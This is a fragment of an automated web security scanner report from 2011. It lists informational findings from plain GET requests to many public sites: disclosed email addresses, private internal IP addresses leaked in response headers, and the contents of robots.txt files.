<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. <br><br>Please contact the VA Network and Security Operations Center at 1-800-877-4328 or email VANSOC@va.gov, if you feel this is in error. <br>
...[SNIP]...

22.15. http://www.wa.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wa.gov
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wa.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:28 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1034

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:servicedesk@dis.wa.gov" />
...[SNIP]...
<a href="mailto:servicedesk@dis.wa.gov">
...[SNIP]...

22.16. http://www.websitealive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...
<a href="mailto:sales@websitealive.com">sales@websitealive.com</a>
...[SNIP]...

23. Private IP addresses disclosed
There are 14 instances of this issue:


23.1. http://www.aa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aa.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Content-Type: text/plain
Last-Modified: Wed, 30 Sep 2009 14:35:22 GMT
Content-Length: 1406
Content-Language: en-US
Server: On-Demand Router/1.0
Via: On-Demand Router/1.0
Age: 1
Warning: 110 /10.243.14.54:12405 "Response is stale"
Vary: Accept-Encoding, User-Agent

...[SNIP]...

23.2. http://www.americantowns.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...[SNIP]...

23.3. http://www.celebuzz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebuzz.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebuzz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.celebuzz.com
X-Powered-By: PHP/5.3.5
Content-Length: 0
X-RSID: 172.20.21.34
Content-Type: image/vnd.microsoft.icon


23.4. http://www.facebook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.facebook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Mon, 02 May 2011 12:36:48 GMT
X-FB-Server: 10.54.238.35
X-Cnection: close
Date: Sat, 02 Apr 2011 12:36:48 GMT
Content-Length: 152


23.5. http://www.findgovernmentjobs.info/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findgovernmentjobs.info
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findgovernmentjobs.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File not found
Server: Varnish
X-Varnish: 2176951948
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 14:18:40 GMT
Via: 1.1 varnish 172.17.2.157
Connection: Keep-Alive
Age: 0
Content-Length: 473


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>404 File not found</ti
...[SNIP]...

23.6. http://www.frontier.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frontier.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4cCMYJK; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Thu, 04 Mar 2010 19:40:47 GMT
Accept-Ranges: bytes
ETag: "80c92496d2bbca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:43 GMT

...[SNIP]...

23.7. http://www.healthcaresource.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcaresource.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthcaresource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 27 Jan 2010 19:32:38 GMT
Date: Sat, 02 Apr 2011 13:51:07 GMT
X-Varnish: 2396180064 2396109138
Via: 1.1 varnish 172.17.34.171
X-Cache: HIT
Content-Length: 0
Connection: Keep-alive
Via: 1.1 AN-0003011042661266


23.8. http://www.lanebryant.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lanebryant.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 60807
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

<!DOCTYPE html>
<html lang="en">
   <head>
        <link rel="shortcut icon" type="image/x-icon" href="http://www.lanebryant.com/assets/lb/assets/favicon.ico" />

<title>Lane Bryant | Lane Bryant</t
...[SNIP]...
<script language="JavaScript" type="text/javascript">
s.server = "192.168.187.101";
if (!checkVariable(s.pageName)) {
   s.pageName = 'Not Found';
}

if (!checkVariable(s.channel)) {
   s.channel = "";
}
s.campaign = "";
var eventKey = "";
s.events = eventKey;
s.products = "";
s.purcha
...[SNIP]...

23.9. http://www.myyearbook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myyearbook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.83

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.10. http://www.ning.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

...[SNIP]...

23.11. http://www.phoneagentsource.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoneagentsource.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoneagentsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:54 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 09 Mar 2011 07:44:32 GMT
Content-Length: 17542
X-Varnish: 723278010 723267690
Age: 72
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

...[SNIP]...

23.12. http://www.shoebuy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoebuy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 24 Sep 2008 05:15:33 GMT
ETag: "47e-5fa56740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:37 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKekAACDvAwsZAg==; path=/; expires=Thu, 31-Mar-16 13:51:37 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:37 GMT;path=/

...[SNIP]...

23.13. http://www.tracfone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...[SNIP]...

23.14. http://www.younghollywood.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.younghollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Jan 2011 11:44:01 GMT
ETag: "340016c-e36-49a59c42ea240"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 07:48:58 GMT
Content-Type: image/x-icon
Content-Length: 3638
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:07 GMT
X-Varnish: 2005739019 2004915932
Age: 21189
Via: 1.1 varnish
Connection: keep-alive

...[SNIP]...

24. Robots.txt file
There are 962 instances of this issue:


24.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

24.2. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:57:07 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

24.3. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

24.4. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:57:38 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

24.5. http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2830766/cisco_webex_Hard-hit_AllText_728x90_r1.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:55:09 GMT
Expires: Thu, 31 Mar 2011 03:40:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 32502
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

24.6. http://smp.adviva.net/track/v=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /track/v=4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 08 Sep 2009 15:43:03 GMT
ETag: "20126-1a-47312d260afc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

24.7. http://www.110mb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.110mb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.110mb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:15 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2007 11:11:48 GMT
ETag: "d46035-363-e068a500"
Accept-Ranges: bytes
Content-Length: 867
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/*sa=showPosts*
Disallow: /forum/*prev_next*
Disallow: /forum/*action=printpage*
Disallow: /forum/*action=recent*
Disallow: /forum/*action=login*
Disallow: /forum/*
...[SNIP]...

24.8. http://www.123greetings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.123greetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Expires: Sat, 02 Apr 2011 13:39:32 GMT
Last-Modified: Sat, 13 Mar 2010 05:18:01 GMT
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
ETag: "8c-c5915440"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 140
Connection: close

User-agent: *
Disallow: /rd1
Disallow: /rd2
Disallow: /aff-bin
Disallow: /send
Disallow: /usr-bin
Disallow: /sendcard
Disallow: /createcard

24.9. http://www.2insure4less.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2insure4less.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2insure4less.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 10 Aug 2010 17:39:42 GMT
Accept-Ranges: bytes
ETag: "038c3b338cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="CAO PSA OUR"
Date: Sat, 02 Apr 2011 13:45:13 GMT
Connection: close
Content-Length: 269

User-agent: *
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /code/
Disallow: /cpm/
Disallow: /css/
Disallow: /ms/
Disallow: /quotes/
Disallow: /scripts/
Disallow: /Welcomeback/
Di
...[SNIP]...

24.10. http://www.2leep.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2leep.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2leep.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:35:30 GMT
Content-Type: text/plain
Content-Length: 419
Last-Modified: Fri, 26 Nov 2010 07:07:24 GMT
Connection: close
Expires: Mon, 02 May 2011 13:35:30 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-Agent: *
Allow: /
Disallow: /auth/
Disallow: /3/
Disallow: /2/
Disallow: /tech/3/
Disallow: /tech/2/
Disallow: /environment/3/
Disallow: /environment/2/
Disallow: /celebrities/3/
Disallow: /celeb
...[SNIP]...

24.11. http://www.411.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.411.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:02 GMT
Status: 200 OK
X-Runtime: 0.00766
ETag: "07f8c36f31f1b5c4a97ad2bac9ef439d"
Connection: close
Set-Cookie: wp_endemic_provider=C; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:02 GMT
Set-Cookie: wp_perm=pid%3D_aXmJl0uEeCr3gAfKQsxwA; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:02 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:02 GMT
Set-Cookie: _wpn_sid=1197b47dbd0859ffef29c50902fb29df; domain=.411.com; path=/
Content-Length: 1077

User-agent: *
Disallow: /dir/*/*/*/
Disallow: /dir*?
Disallow: /*search/Replay
Disallow: /*search/FindAreacode
Disallow: /*search/ReverseAreacode
Disallow: /*search/FindZip
Disallow: /*search/ReverseZ
...[SNIP]...

24.12. http://www.43things.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.43things.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 21:29:47 GMT
Accept-Ranges: bytes
Content-Length: 507
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for www.43things.com
#

User-agent: msnbot
Disallow: /admin
Disallow: /auth
Disallow: /invitations
Disallow: /mailing_list
Disallow: /twinkler/add
Crawl-delay: 20

User-agent: twiceler
C
...[SNIP]...

24.13. http://www.4chan.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4chan.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4chan.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:11 GMT
Server: Apache
Last-Modified: Tue, 12 Jan 2010 20:08:19 GMT
ETag: "8a005-11a-47cfd370cd2c0"
Accept-Ranges: bytes
Content-Length: 282
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow:
User-agent: MSNBot
Disallow:
User-agent: Slurp
Disallow:
User-agent: Googlebot-Image
Disallow: /
User-agent: Googlebot-Mobile
Disallow: /
User-agent: Mediapartners-G
...[SNIP]...

24.14. http://www.4tubemate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubemate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4tubemate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:33 GMT
Server: Apache
Content-Length: 38
Last-Modified: Sat, 05 Feb 2011 00:52:06 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: text/plain

user-agent: *
disallow: /myalerts.php

24.15. http://www.6pm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6pm.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: text/plain
Cteonnt-Length: 759
Last-Modified: Wed, 02 Feb 2011 03:43:44 GMT
Cache-Control: private, max-age=28135170
Date: Sat, 02 Apr 2011 14:06:08 GMT
Content-Length: 759
Connection: close

User-agent: *
Disallow: /r/
Disallow: /bin/
Disallow: /n/howtophone.cgi
Disallow: /n/multi_view.cgi
Disallow: /n/redirect.cgi
Disallow: /noauth/redirect.cgi
Disallow: /n/sc
Disallow: /multiview
Disall
...[SNIP]...

24.16. http://www.800notes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.800notes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.800notes.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:57:38 GMT
Connection: close
Content-Length: 152

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /~sys~/
Disallow: /%7esys%7e/
Disallow: /nb/
Disallow: /awl/
Disallow: /forum/nb/

24.17. http://www.aaa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaa.com

Response

HTTP/1.1 200 OK
Content-Length: 431
Content-Type: text/plain
Last-Modified: Wed, 17 Feb 2010 09:06:03 GMT
Accept-Ranges: bytes
ETag: "884f976eb0afca1:6145c"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:06 GMT
Connection: close

# For domain: http://www.aaa.com

User-agent: *
Disallow: /scripts/WebObjects.dll/*
User-agent: googlebot
Disallow: /scripts/WebObjects.dll/*
Allow: /scripts/WebObjects.dll/*page=*
User-agent
...[SNIP]...

24.18. http://www.aarp.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aarp.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:12 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 13:14:37 GMT
Accept-Ranges: bytes
Content-Length: 57
Vary: Accept-Encoding
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Keep-Alive: timeout=15, max=6
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

User-Agent: gsa-crawler
Disallow: /applications/search/

24.19. http://www.abebooks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abebooks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abebooks.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 24 Mar 2010 17:55:41 GMT
ETag: "85263-6df-4828fa3730140"-gzip
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 14:11:44 GMT
Date: Sat, 02 Apr 2011 13:56:44 GMT
Content-Length: 1759
Connection: close

